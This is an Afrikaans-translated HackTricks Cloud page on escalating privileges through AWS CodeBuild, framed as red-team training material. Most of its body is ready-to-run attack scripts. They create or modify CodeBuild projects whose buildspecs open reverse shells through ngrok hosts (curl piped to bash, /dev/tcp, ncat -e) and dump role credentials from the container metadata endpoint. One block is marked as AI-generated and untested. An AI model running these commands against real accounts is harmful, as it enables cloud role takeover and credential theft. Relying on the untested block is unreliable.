AWS - Codebuild Privesc

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat Kontroleer die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

codebuild

Kry meer inligting in:

`iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

'n Aanvaller met die iam:PassRole, codebuild:CreateProject, en codebuild:StartBuild of codebuild:StartBuildBatch-permissies sal in staat wees om privileges te eskaleer na enige codebuild IAM-rol deur 'n lopende een te skep.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

# Generated by AI, not tested
# Create a buildspec.yml file with reverse shell command
echo 'version: 0.2
phases:
build:
commands:
- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml

# Upload the buildspec to the bucket and give access to everyone
aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml

# Create a new CodeBuild project with the buildspec.yml file
aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60

# Start a build with the new project
aws codebuild start-build --project-name reverse-shell-project

Potensiële Impak: Direkte privesc na enige AWS Codebuild rol.

In 'n Codebuild houer bevat die lêer /codebuild/output/tmp/env.sh al die omgewingsveranderlikes wat nodig is om die metadata geloofsbriewe te kry.

Hierdie lêer bevat die omgewingsveranderlike AWS_CONTAINER_CREDENTIALS_RELATIVE_URI wat die URL-pad bevat om die geloofsbriewe te kry. Dit sal iets soos hierdie wees /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Voeg dit by die URL http://169.254.170.2/ en jy sal in staat wees om die rol geloofsbriewe te dump.

Daarbenewens bevat dit ook die omgewingsveranderlike ECS_CONTAINER_METADATA_URI wat die volledige URL bevat om metadata-inligting oor die houer te kry.

`iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

Net soos in die vorige afdeling, as jy in plaas van 'n bouprojek te skep dit kan wysig, kan jy die IAM Rol aandui en die token steel

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potensiële Impak: Direkte privilige-escalation na enige AWS Codebuild rol.

`codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

Soos in die vorige afdeling maar sonder die iam:PassRole toestemming, kan jy hierdie toestemmings misbruik om bestaande Codebuild projekte te wysig en toegang te verkry tot die rol wat hulle reeds toegewys het.

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild-demo-project

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potensiële Impak: Direkte privesc na aanheg AWS Codebuild rolle.

SSM

Met genoeg toestemmings om 'n ssm-sessie te begin is dit moontlik om binne 'n Codebuild projek wat gebou word, te kom.

Die codebuild projek sal 'n breekpunt moet hê:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

En dan:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Vir meer inligting kyk na die dokumente.

(`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`

'n Aanvaller wat in staat is om 'n bou van 'n spesifieke CodeBuild projek te begin/herbegin waarvan die buildspec.yml lêer op 'n S3-emmer gestoor word waarop die aanvaller skryftoegang het, kan bevel uitvoering in die CodeBuild-proses verkry.

Nota: die eskalasie is slegs relevant as die CodeBuild-werker 'n ander rol het, hopelik meer bevoorreg, as dié van die aanvaller.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Jy kan iets soos hierdie builspec gebruik om 'n omgekeerde dop te kry:

buildspec.yml

version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impak: Direkte privesc na die rol wat deur die AWS CodeBuild-werker gebruik word en wat gewoonlik hoë voorregte het.

Let daarop dat die buildspec in zip-formaat verwag kan word, sodat 'n aanvaller dit moet aflaai, uitpak, die buildspec.yml vanuit die hoofgids wysig, weer in zip-formaat komprimeer en oplaai.

Meer besonderhede kan hier gevind word hier.

Potensiële Impak: Direkte privesc na aangehegte AWS Codebuild-rolle.

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks in PDF aflaai, kyk na die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks-klere
Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

PreviousAWS - Chime Privesc NextAWS - Codepipeline Privesc

Last updated 8 months ago